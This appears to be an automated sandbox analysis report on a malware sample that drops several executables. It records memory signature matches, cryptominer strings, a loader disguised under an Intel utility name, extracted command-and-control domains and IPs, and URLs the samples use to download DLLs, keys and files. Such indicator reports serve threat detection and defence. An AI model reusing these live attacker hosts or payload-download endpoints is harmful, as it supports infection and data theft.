                      Source: Yara matchFile source: 00000024.00000002.2597232510.0000000000E09000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000033.00000002.2996017964.000000014040B000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000024.00000002.2597932225.00000001402DD000.00000002.00000001.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000033.00000002.2933758160.0000000000BE9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000024.00000002.2598240255.000000014040B000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000003.2591781402.00000237117F0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000033.00000002.2995871768.00000001402DD000.00000002.00000001.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000033.00000002.2933758160.0000000000BC9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000024.00000002.2597232510.0000000000DE9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Intel_PTT_EK_Recertification.exe PID: 7772, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 2368, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 7580, type: MEMORYSTR
                      Source: Intel_PTT_EK_Recertification.exe, 00000022.00000003.2591781402.00000237117F0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: stratum+tcp://
                      Source: Intel_PTT_EK_Recertification.exe, 00000022.00000003.2591781402.00000237117F0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: cryptonight/0
                      Source: Intel_PTT_EK_Recertification.exe, 00000022.00000003.2591781402.00000237117F0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: -o, --url=URL URL of mining server
                      Source: Intel_PTT_EK_Recertification.exe, 00000022.00000003.2591781402.00000237117F0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: stratum+tcp://
                      Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: C:\Users\user\AppData\Local\Temp\1019030001\0577f55121.exeFile opened: C:\Windows\SysWOW64\msvcr100.dll
                      Source: Binary string: D:\a\_work\1\s\src\StoreInstaller\obj\Release\net472\StoreInstaller.pdb source: 4268204ace.exe, 0000000F.00000002.2742198429.0000000003B95000.00000004.00000800.00020000.00000000.sdmp, 4268204ace.exe, 0000000F.00000002.2742198429.0000000003CBA000.00000004.00000800.00020000.00000000.sdmp, 5119130eb96345a8a13dc770d0f33571.exe, 0000002C.00000000.2721445578.00000220D3472000.00000002.00000001.01000000.00000014.sdmp
                      Source: Binary string: D:\a\_work\1\s\src\StoreInstaller\obj\Release\net472\StoreInstaller.pdbSHA256\u source: 4268204ace.exe, 0000000F.00000002.2742198429.0000000003B95000.00000004.00000800.00020000.00000000.sdmp, 4268204ace.exe, 0000000F.00000002.2742198429.0000000003CBA000.00000004.00000800.00020000.00000000.sdmp, 5119130eb96345a8a13dc770d0f33571.exe, 0000002C.00000000.2721445578.00000220D3472000.00000002.00000001.01000000.00000014.sdmp
                      Source: Binary string: C:\Users\danie\source\repos\NewText\NewText\obj\Debug\NewTextV2.pdb source: 4268204ace.exe, 0000000F.00000000.2555729362.00000000007D2000.00000002.00000001.01000000.0000000C.sdmp
                      Source: Binary string: C:\Users\danie\source\repos\NewText\NewText\obj\Debug\NewTextV2.pdbdj~j pj_CorExeMainmscoree.dll source: 4268204ace.exe, 0000000F.00000000.2555729362.00000000007D2000.00000002.00000001.01000000.0000000C.sdmp
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeDirectory queried: number of queries: 1001
                      Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 11_2_001D7978 FindFirstFileW,FindFirstFileW,free,11_2_001D7978
                      Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 11_2_001D881C free,free,GetLogicalDriveStringsW,GetLogicalDriveStringsW,free,free,free,11_2_001D881C
                      Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior
                      Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
                      Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\main\Jump to behavior
                      Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
                      Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\Jump to behavior
                      Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\main\extractedJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeCode function: 4x nop then jmp 02B03677h15_2_02B0347A

                      Networking

                      barindex
                      Source: Malware configuration extractorURLs: sustainskelet.lat
                      Source: Malware configuration extractorURLs: sweepyribs.lat
                      Source: Malware configuration extractorURLs: crosshuaht.lat
                      Source: Malware configuration extractorURLs: rapeflowwj.lat
                      Source: Malware configuration extractorURLs: necklacebudi.lat
                      Source: Malware configuration extractorURLs: discokeyus.lat
                      Source: Malware configuration extractorURLs: energyaffai.lat
                      Source: Malware configuration extractorURLs: aspecteirs.lat
                      Source: Malware configuration extractorURLs: grannyejh.lat
                      Source: Malware configuration extractorURLs: https://steamcommunity.com/profiles/76561199809363512
                      Source: Malware configuration extractorIPs: 185.215.113.43
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: wNFfgZ1.exe.5.dr
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 127.0.0.1
                      Source: unknownNetwork traffic detected: IP country count 10
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0005E0C0 recv,recv,recv,recv,0_2_0005E0C0
                      Source: 9c2981f3e5.exe, 0000002A.00000003.2686987170.0000000007370000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://.css
                      Source: 9c2981f3e5.exe, 0000002A.00000003.2686987170.0000000007370000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://.jpg
                      Source: 0577f55121.exe, 0000002E.00000003.3228694024.0000000005552000.00000004.00000020.00020000.00000000.sdmp, 0577f55121.exe, 0000002E.00000003.3202086239.0000000005552000.00000004.00000020.00020000.00000000.sdmp, 0577f55121.exe, 0000002E.00000003.3146323550.0000000005552000.00000004.00000020.00020000.00000000.sdmp, 0577f55121.exe, 0000002E.00000003.3176254742.0000000005552000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.73.23/K
                      Source: 0577f55121.exe, 0000002E.00000003.3202086239.0000000005562000.00000004.00000020.00020000.00000000.sdmp, 0577f55121.exe, 0000002E.00000003.3228694024.0000000005562000.00000004.00000020.00020000.00000000.sdmp, 0577f55121.exe, 0000002E.00000003.3146323550.0000000005562000.00000004.00000020.00020000.00000000.sdmp, 0577f55121.exe, 0000002E.00000003.3176254742.0000000005562000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.73.23/dll/download
                      Source: 0577f55121.exe, 0000002E.00000003.3228694024.0000000005552000.00000004.00000020.00020000.00000000.sdmp, 0577f55121.exe, 0000002E.00000003.3202086239.0000000005552000.00000004.00000020.00020000.00000000.sdmp, 0577f55121.exe, 0000002E.00000003.3146323550.0000000005552000.00000004.00000020.00020000.00000000.sdmp, 0577f55121.exe, 0000002E.00000003.3176254742.0000000005552000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.73.23/dll/key
                      Source: 0577f55121.exe, 0000002E.00000003.3228694024.0000000005552000.00000004.00000020.00020000.00000000.sdmp, 0577f55121.exe, 0000002E.00000003.3202086239.0000000005552000.00000004.00000020.00020000.00000000.sdmp, 0577f55121.exe, 0000002E.00000003.3146323550.0000000005552000.00000004.00000020.00020000.00000000.sdmp, 0577f55121.exe, 0000002E.00000003.3176254742.0000000005552000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.73.23/dll/keyW
                      Source: 0577f55121.exe, 0000002E.00000003.3228694024.0000000005552000.00000004.00000020.00020000.00000000.sdmp, 0577f55121.exe, 0000002E.00000003.3202086239.0000000005552000.00000004.00000020.00020000.00000000.sdmp, 0577f55121.exe, 0000002E.00000003.3146323550.0000000005552000.00000004.00000020.00020000.00000000.sdmp, 0577f55121.exe, 0000002E.00000003.3176254742.0000000005552000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.73.23/dll/keyhqos.dll.mui
                      Source: 0577f55121.exe, 0000002E.00000003.3176254742.0000000005552000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.73.23/files/download
                      Source: 0577f55121.exe, 0000002E.00000003.3228694024.0000000005552000.00000004.00000020.00020000.00000000.sdmp, 0577f55121.exe, 0000002E.00000003.3202086239.0000000005552000.00000004.00000020.00020000.00000000.sdmp, 0577f55121.exe, 0000002E.00000003.3146323550.0000000005552000.00000004.00000020.00020000.00000000.sdmp, 0577f55121.exe, 0000002E.00000003.3176254742.0000000005552000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.73.23/files/download1
                      Source: 0577f55121.exe, 0000002E.00000003.3228694024.0000000005552000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.73.23/files/downloadK
                      Source: 0577f55121.exe, 0000002E.00000003.3228694024.0000000005552000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.73.23/files/downloadM
                      Source: 0577f55121.exe, 0000002E.00000003.3228694024.0000000005552000.00000004.00000020.00020000.00000000.sdmp, 0577f55121.exe, 0000002E.00000003.3202086239.0000000005552000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.73.23/files/downloadc
                      Source: 77594b3442.exe, 00000031.00000003.3012434030.00000000052D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                      Source: 77594b3442.exe, 00000031.00000003.3012434030.00000000052D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                      Source: powershell.exe, 00000028.00000002.2650660528.0000000008A62000.00000004.00000020.00020000.00000000.sdmp, 77594b3442.exe, 00000031.00000003.3148185991.00000000004FE000.00000004.00000020.00020000.00000000.sdmp, 77594b3442.exe, 00000039.00000003.3060235969.00000000005B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
                      Source: 77594b3442.exe, 00000031.00000003.3012434030.00000000052D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
                      Source: 77594b3442.exe, 00000031.00000003.3012434030.00000000052D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                      Source: 77594b3442.exe, 00000031.00000003.3012434030.00000000052D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                      Source: 77594b3442.exe, 00000031.00000003.3012434030.00000000052D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                      Source: 77594b3442.exe, 00000031.00000003.3012434030.00000000052D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
                      Source: 5119130eb96345a8a13dc770d0f33571.exe, 0000002C.00000002.2786097860.00000220D551B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://defaultcontainer/StoreInstaller;component/Resources/StoreAppList.Light.png
                      Source: 5119130eb96345a8a13dc770d0f33571.exe, 0000002C.00000002.2786097860.00000220D551B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://defaultcontainer/StoreInstaller;component/Resources/StoreLogo.Light.png
                      Source: 5119130eb96345a8a13dc770d0f33571.exe, 0000002C.00000002.2786097860.00000220D5708000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://defaultcontainer/StoreInstaller;component/Resources/Theme/Light.xaml
                      Source: 5119130eb96345a8a13dc770d0f33571.exe, 0000002C.00000002.2786097860.00000220D5708000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://defaultcontainer/StoreInstaller;component/Resources/app.Light.ico
                      Source: 5119130eb96345a8a13dc770d0f33571.exe, 0000002C.00000002.2786097860.00000220D5614000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://e12564.dspb.akamaiedge.net
                      Source: svchost.exe, 0000002D.00000003.2733073587.000001EE6AC78000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
                      Source: svchost.exe, 0000002D.00000003.2733073587.000001EE6AC78000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acosgr5ufcefr7w7nv4v6k4ebdda_117.0.5938.132/117.0.5
                      Source: svchost.exe, 0000002D.00000003.2733073587.000001EE6AC78000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
                      Source: svchost.exe, 0000002D.00000003.2733073587.000001EE6AC78000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
                      Source: svchost.exe, 0000002D.00000003.2733073587.000001EE6AC78000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
                      Source: svchost.exe, 0000002D.00000003.2733073587.000001EE6AC78000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
                      Source: svchost.exe, 0000002D.00000003.2733073587.000001EE6ACAD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
                      Source: svchost.exe, 0000002D.00000003.2733073587.000001EE6AD67000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
                      Source: 5119130eb96345a8a13dc770d0f33571.exe, 0000002C.00000002.2786097860.00000220D551B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/Resources/StoreAppList.Light.png
                      Source: 5119130eb96345a8a13dc770d0f33571.exe, 0000002C.00000002.2786097860.00000220D551B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/Resources/StoreLogo.Light.png
                      Source: 5119130eb96345a8a13dc770d0f33571.exe, 0000002C.00000002.2786097860.00000220D5708000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/Resources/app.Light.ico
                      Source: 5119130eb96345a8a13dc770d0f33571.exe, 0000002C.00000002.2786097860.00000220D5708000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/bar/resources/app.light.ico
                      Source: 5119130eb96345a8a13dc770d0f33571.exe, 0000002C.00000002.2786097860.00000220D551B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/bar/resources/storeapplist.light.png
                      Source: 5119130eb96345a8a13dc770d0f33571.exe, 0000002C.00000002.2786097860.00000220D551B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/bar/resources/storelogo.light.png
                      Source: 4268204ace.exe, 0000000F.00000002.2729833635.0000000002BEC000.00000004.00000800.00020000.00000000.sdmp, 4268204ace.exe, 0000000F.00000002.2729833635.0000000002BDA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://github.com
                      Source: 4268204ace.exe, 0000000F.00000002.2729833635.0000000002BEC000.00000004.00000800.00020000.00000000.sdmp, 4268204ace.exe, 0000000F.00000002.2729833635.0000000002BDA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://github.comd
                      Source: 9c2981f3e5.exe, 0000002A.00000003.2686987170.0000000007370000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://home.twentytk20ht.top/TQIuuaqjNpwYjtUvFoj850
                      Source: 9c2981f3e5.exe, 0000002A.00000003.2686987170.0000000007370000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://html4/loose.dtd
                      Source: powershell.exe, 00000020.00000002.2598419733.0000000006387000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2642561965.00000000060F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                      Source: 77594b3442.exe, 00000031.00000003.3012434030.00000000052D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                      Source: 77594b3442.exe, 00000031.00000003.3012434030.00000000052D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
                      Source: powershell.exe, 00000028.00000002.2631755685.00000000051E5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                      Source: 4268204ace.exe, 0000000F.00000002.2729833635.0000000002C75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://raw.githubusercontent.com
                      Source: 4268204ace.exe, 0000000F.00000002.2729833635.0000000002C75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://raw.githubusercontent.comd
                      Source: 5119130eb96345a8a13dc770d0f33571.exe, 0000002C.00000002.2786097860.00000220D549F000.00000004.00000800.00020000.00000000.sdmp, 5119130eb96345a8a13dc770d0f33571.exe, 0000002C.00000002.2786097860.00000220D57CE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org
                      Source: 5119130eb96345a8a13dc770d0f33571.exe, 0000002C.00000002.2786097860.00000220D549F000.00000004.00000800.00020000.00000000.sdmp, 5119130eb96345a8a13dc770d0f33571.exe, 0000002C.00000002.2786097860.00000220D57CE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org/
                      Source: 5119130eb96345a8a13dc770d0f33571.exe, 0000002C.00000002.2786097860.00000220D549F000.00000004.00000800.00020000.00000000.sdmp, 5119130eb96345a8a13dc770d0f33571.exe, 0000002C.00000002.2786097860.00000220D57CE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/
                      Source: 5119130eb96345a8a13dc770d0f33571.exe, 0000002C.00000002.2786097860.00000220D549F000.00000004.00000800.00020000.00000000.sdmp, 5119130eb96345a8a13dc770d0f33571.exe, 0000002C.00000002.2786097860.00000220D57CE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/StoreInstaller.Models
                      Source: 5119130eb96345a8a13dc770d0f33571.exe, 0000002C.00000002.2786097860.00000220D57CE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/StoreInstaller.ModelspXu
                      Source: powershell.exe, 00000020.00000002.2595289423.0000000005475000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2631755685.00000000051E5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                      Source: 4268204ace.exe, 0000000F.00000002.2729833635.0000000002B31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.2595289423.0000000005321000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2631755685.0000000005091000.00000004.00000800.00020000.00000000.sdmp, 5119130eb96345a8a13dc770d0f33571.exe, 0000002C.00000002.2786097860.00000220D551B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: powershell.exe, 00000020.00000002.2595289423.0000000005475000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2631755685.00000000051E5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                      Source: 9bc5ebea0e.exe, 00000007.00000000.2504593423.0000000000423000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: http://usbtor.ru/viewtopic.php?t=798)Z
                      Source: powershell.exe, 00000028.00000002.2631755685.00000000051E5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                      Source: 5119130eb96345a8a13dc770d0f33571.exe, 0000002C.00000002.2786097860.00000220D549F000.00000004.00000800.00020000.00000000.sdmp, 5119130eb96345a8a13dc770d0f33571.exe, 0000002C.00000002.2786097860.00000220D57CE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.w3.oh
                      Source: 77594b3442.exe, 00000031.00000003.3012434030.00000000052D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                      Source: 77594b3442.exe, 00000031.00000003.3012434030.00000000052D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                      Source: 77594b3442.exe, 00000031.00000003.2935489662.00000000052EB000.00000004.00000800.00020000.00000000.sdmp, 77594b3442.exe, 00000031.00000003.2934403665.00000000052EE000.00000004.00000800.00020000.00000000.sdmp, 77594b3442.exe, 00000031.00000003.2934894948.00000000052EB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                      Source: powershell.exe, 00000020.00000002.2595289423.0000000005321000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2631755685.0000000005091000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
                      Source: 77594b3442.exe, 00000031.00000003.3040740995.000000000053B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
                      Source: 77594b3442.exe, 00000031.00000003.3040740995.000000000053B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
                      Source: 77594b3442.exe, 00000031.00000003.2935489662.00000000052EB000.00000004.00000800.00020000.00000000.sdmp, 77594b3442.exe, 00000031.00000003.2934403665.00000000052EE000.00000004.00000800.00020000.00000000.sdmp, 77594b3442.exe, 00000031.00000003.2934894948.00000000052EB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                      Source: 77594b3442.exe, 00000031.00000003.2935489662.00000000052EB000.00000004.00000800.00020000.00000000.sdmp, 77594b3442.exe, 00000031.00000003.2934403665.00000000052EE000.00000004.00000800.00020000.00000000.sdmp, 77594b3442.exe, 00000031.00000003.2934894948.00000000052EB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                      Source: 77594b3442.exe, 00000031.00000003.2935489662.00000000052EB000.00000004.00000800.00020000.00000000.sdmp, 77594b3442.exe, 00000031.00000003.2934403665.00000000052EE000.00000004.00000800.00020000.00000000.sdmp, 77594b3442.exe, 00000031.00000003.2934894948.00000000052EB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                      Source: 77594b3442.exe, 00000031.00000003.3040740995.000000000053B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
                      Source: 77594b3442.exe, 00000031.00000003.3040740995.000000000053B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                      Source: powershell.exe, 00000028.00000002.2642561965.00000000060F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                      Source: powershell.exe, 00000028.00000002.2642561965.00000000060F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                      Source: powershell.exe, 00000028.00000002.2642561965.00000000060F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                      Source: 9c2981f3e5.exe, 0000002A.00000003.2686987170.0000000007370000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://curl.se/docs/alt-svc.html
                      Source: 9c2981f3e5.exe, 0000002A.00000003.2686987170.0000000007370000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://curl.se/docs/hsts.html
                      Source: 9c2981f3e5.exe, 0000002A.00000003.2686987170.0000000007370000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://curl.se/docs/http-cookies.html
                      Source: 77594b3442.exe, 00000031.00000003.3075295928.0000000000515000.00000004.00000020.00020000.00000000.sdmp, 77594b3442.exe, 00000039.00000003.3063497186.0000000000575000.00000004.00000020.00020000.00000000.sdmp, 77594b3442.exe, 00000039.00000002.3104578420.0000000000575000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discokeyus.lat/
                      Source: 77594b3442.exe, 00000039.00000003.3063497186.0000000000575000.00000004.00000020.00020000.00000000.sdmp, 77594b3442.exe, 00000039.00000002.3104578420.0000000000575000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discokeyus.lat/6
                      Source: 77594b3442.exe, 00000031.00000003.3137575871.0000000000515000.00000004.00000020.00020000.00000000.sdmp, 77594b3442.exe, 00000031.00000003.3075295928.0000000000515000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discokeyus.lat/U
                      Source: 77594b3442.exe, 00000031.00000003.3040855267.00000000052A9000.00000004.00000800.00020000.00000000.sdmp, 77594b3442.exe, 00000031.00000003.3148807130.00000000052B1000.00000004.00000800.00020000.00000000.sdmp, 77594b3442.exe, 00000031.00000003.3148640294.00000000052AE000.00000004.00000800.00020000.00000000.sdmp, 77594b3442.exe, 00000031.00000003.3075295928.0000000000507000.00000004.00000020.00020000.00000000.sdmp, 77594b3442.exe, 00000031.00000003.2968852424.00000000052A6000.00000004.00000800.00020000.00000000.sdmp, 77594b3442.exe, 00000039.00000003.3063497186.0000000000575000.00000004.00000020.00020000.00000000.sdmp, 77594b3442.exe, 00000039.00000002.3103939592.0000000000552000.00000004.00000020.00020000.00000000.sdmp, 77594b3442.exe, 00000039.00000002.3104578420.0000000000575000.00000004.00000020.00020000.00000000.sdmp, 77594b3442.exe, 00000039.00000002.3104470563.000000000056D000.00000004.00000020.00020000.00000000.sdmp, 77594b3442.exe, 00000039.00000003.3063570796.000000000056D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discokeyus.lat/api
                      Source: 77594b3442.exe, 00000031.00000003.3082778417.00000000052AA000.00000004.00000800.00020000.00000000.sdmp, 77594b3442.exe, 00000031.00000003.3148640294.00000000052AB000.00000004.00000800.00020000.00000000.sdmp, 77594b3442.exe, 00000031.00000003.3075604245.00000000052AA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discokeyus.lat/api-
                      Source: 77594b3442.exe, 00000031.00000003.3075295928.0000000000524000.00000004.00000020.00020000.00000000.sdmp, 77594b3442.exe, 00000031.00000003.3137575871.0000000000524000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discokeyus.lat/apion_pre
                      Source: 77594b3442.exe, 00000031.00000003.3137575871.0000000000515000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discokeyus.lat/c
                      Source: 77594b3442.exe, 00000039.00000003.3063497186.0000000000575000.00000004.00000020.00020000.00000000.sdmp, 77594b3442.exe, 00000039.00000002.3104578420.0000000000575000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discokeyus.lat/l
                      Source: 77594b3442.exe, 00000031.00000003.2969030804.00000000052A6000.00000004.00000800.00020000.00000000.sdmp, 77594b3442.exe, 00000031.00000003.2968852424.00000000052A6000.00000004.00000800.00020000.00000000.sdmp, 77594b3442.exe, 00000039.00000002.3103939592.0000000000549000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discokeyus.lat:443/api
                      Source: 77594b3442.exe, 00000031.00000003.3040855267.00000000052AF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discokeyus.lat:443/apiK
                      Source: 77594b3442.exe, 00000031.00000003.2935489662.00000000052EB000.00000004.00000800.00020000.00000000.sdmp, 77594b3442.exe, 00000031.00000003.2934403665.00000000052EE000.00000004.00000800.00020000.00000000.sdmp, 77594b3442.exe, 00000031.00000003.2934894948.00000000052EB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                      Source: 77594b3442.exe, 00000031.00000003.2935489662.00000000052EB000.00000004.00000800.00020000.00000000.sdmp, 77594b3442.exe, 00000031.00000003.2934403665.00000000052EE000.00000004.00000800.00020000.00000000.sdmp, 77594b3442.exe, 00000031.00000003.2934894948.00000000052EB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
